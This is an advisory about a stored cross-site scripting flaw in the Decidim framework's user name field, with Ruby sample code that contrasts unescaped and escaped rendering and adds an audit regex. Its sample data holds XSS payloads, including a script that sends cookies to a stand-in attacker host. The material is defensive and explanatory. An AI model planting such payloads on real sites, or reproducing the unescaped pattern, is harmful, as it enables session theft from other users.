Decidim Stored Code Execution Vulnerability in User Name Field

Vulnerability

A stored code execution vulnerability has been identified in the Decidim participatory democracy framework, affecting versions prior to 0.30.5 and versions 0.31.0.rc1 through 0.31.0. The flaw is in the handling of the user name field: a low-privileged attacker who can set their own user name can store a crafted value, and that payload is then executed in the context of any user who visits a comment page on which the name is rendered. Because the code runs with the privileges of the viewing user's session rather than the attacker's, the impact on confidentiality and integrity crosses the boundary between a low-privileged account and every other account that views the page.
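The pattern described above, shown as an added example (this is illustrative code written for this page, not Decidim's own rendering code): a stored user name is interpolated into comment markup without escaping, so markup in the name becomes live markup for every viewer, while the hardened variant escapes before interpolation. The sample user records, the helper names and the audit pattern are all constructed for the example.

```ruby
require "erb"

# Constructed sample of stored user records (not Decidim data). Users 2 and 3
# carry the kind of payload a low-privileged attacker could plant in a name.
SAMPLE_USERS = [
  { id: 1, name: "Alice Example" },
  { id: 2, name: "Bob <script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>" },
  { id: 3, name: "Carol <img src=x onerror=alert(1)>" },
  { id: 4, name: "Dave & Sons" }, # legitimate name with a special character
].freeze

# Vulnerable pattern: the stored name is concatenated into HTML as-is, so any
# tag or event handler in it is rendered, and executed, in the viewer's browser.
def render_comment_author_unsafe(user)
  "<span class=\"author\">#{user[:name]}</span>"
end

# Hardened pattern: escape the name before interpolation. ERB::Util.html_escape
# turns < > & " ' into entities, so the name is shown as text, never as markup.
def render_comment_author_safe(user)
  "<span class=\"author\">#{ERB::Util.html_escape(user[:name])}</span>"
end

# Post-upgrade audit helper (hypothetical): upgrading stops the payload from
# rendering, but names that were planted earlier remain stored. This flags
# names containing tags, inline event handlers or javascript: URLs so an
# operator can review those accounts. Plain '&' is not flagged.
MARKUP_PATTERN = /<\s*\/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:/i

def suspicious_user_names(users)
  users.select { |u| u[:name].match?(MARKUP_PATTERN) }.map { |u| u[:id] }
end

if __FILE__ == $PROGRAM_NAME
  attacker = SAMPLE_USERS[1]
  puts "unsafe: #{render_comment_author_unsafe(attacker)}"
  puts "safe:   #{render_comment_author_safe(attacker)}"
  puts "accounts to review: #{suspicious_user_names(SAMPLE_USERS).inspect}"
end
```

The audit regex is deliberately broad; it is meant to shortlist accounts for a human to look at, not to serve as an input filter. Output escaping at render time is the fix; filtering names on input is at best a second layer.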

Impact

Exploitation results in stored code execution: code injected through the user name field is executed in the context of every user who views the affected comment page. The attacker needs only a low-privileged account, and the victim needs to do nothing beyond viewing the page, so the payload reaches every participant and administrator who reads the comments.

Remediation

Upgrade to Decidim 0.30.5 (for the 0.30 series) or 0.31.1 (for the 0.31 series). The advisory does not state whether user names already stored before the upgrade are cleaned up, so reviewing existing user names for embedded markup is a sensible follow-up once the patched version is deployed.

Added: Apr 13, 2026, 5:51 PM
Updated: Apr 13, 2026, 5:51 PM

Vulnerability Rating

Custom Algorithm

spread: 2.2
impact: 1.7
exploitability: 5.2
remediation: 7.7
relevance: 5.8
threat: 0.0
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.